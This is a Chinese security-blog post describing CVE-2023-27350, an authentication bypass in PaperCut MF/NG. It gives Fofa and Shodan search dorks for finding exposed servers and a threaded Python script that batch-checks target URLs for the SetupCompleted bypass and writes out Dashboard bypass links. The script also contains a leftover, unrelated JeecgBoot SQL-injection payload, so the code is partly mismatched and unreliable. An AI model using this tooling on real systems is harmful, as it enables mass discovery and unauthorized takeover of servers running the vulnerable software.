探索网络安全新技术
攀登黑客技术最高峰

CVE-2023-27350:PaperCut MF/NG 批量检测脚本

CVE-2023-27350:PaperCut MF/NG 批量检测脚本-威武网安

漏洞说明

此漏洞允许远程攻击者绕过受影响的 PaperCut NG 22.0.5(内部版本 63914)安装上的身份验证。利用此漏洞不需要身份验证。特定缺陷存在于 SetupCompleted 类中。此问题是由于访问控制不当导致的。攻击者可以利用此漏洞绕过身份验证并在 SYSTEM 上下文中执行任意代码。

语法搜索

#Fofa
title="papercut"

# Shodan
http.html:"papercut"

批量检测

from queue import Queue
import re
from threading import Thread, Lock
from bs4 import BeautifulSoup
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

BASE_URL = "/jeecg-boot/jmreport/qurestSql"
data={
  'apiSelectId':'1290104038414721025',
  'id': "1' or '%1%' like (updatexml(0x3a,concat(1,md5('123456'),1)) or '%%' like '"
}
headers={
  'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.',
  'Content-Type': 'application/json;charset=UTF-8',
  'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36'
}


def write_Result(url):
  with open("resuslt.txt", "a", encoding="utf-8") as f:
      f.write(url + "\n")


def ReadFile(fQueue: Queue):
  # self.file = 要读取的文本
  # 当前测试为静态路径
  with open(r"text.txt", 'r', encoding='utf-8') as file:
      for file in file.readlines():
          f = file.replace("\n", '').strip('/')
          fQueue.put(f)


class A(Thread):
  def __init__(self, a):
      super(A, self).__init__()
      self.queue = a
      self.setDaemon(True)

  def run(self) -> None:
      try:
          response = requests.get(url=self.queue + '/app?service=page/SetupCompleted', headers=headers ,json=data,verify=False)
          # print("URL:{} STATUS:{}".format(response.url, response.status_code))
          if response.status_code == 200:
              write_Result(self.queue + '/app?service=page/SetupCompleted')
              soup = BeautifulSoup(response.text, 'html.parser')
              text_div = soup.find('div', class_='text')
              version_span = None
              for span in text_div.find_all('span'):
                  version_match = re.match(r'^\d+\.\d+\.\d+$', span.text.strip())
                  if version_match:
                      version_span = span
                      break
              if version_span is None:
                  print('Not Vulnerable')
              else:
                  version_str = version_span.text.strip()
                  print('Version:', version_str)
                  print('HTTP Status Code:', response.status_code)
                  print(f"1) Visit this URL > {self.queue}/app?service=page/SetupCompleted") 
                  write_Result(self.queue + '/app?service=page/SetupCompleted\n' + self.queue + '/app?service=page/Dashboard')
                  print(f"2) Login Authentication Bypass > {self.queue}/app?service=page/Dashboard")
      except Exception as e:
          pass


q = Queue()
ReadFile(q)
while True:
  url = q.get()
  A(url).start()
  if q.empty():
      break
赞(0) 打赏
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《CVE-2023-27350:PaperCut MF/NG 批量检测脚本》
文章链接:https://www.wevul.com/606.html
本站所有内容均来自互联网,只限个人技术研究,禁止商业用途,请下载后24小时内删除。

评论 1

  1. #1

    感谢大佬 正需要

    AKA10个月前 (05-14)回复

如果文章对你有帮助 可以打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册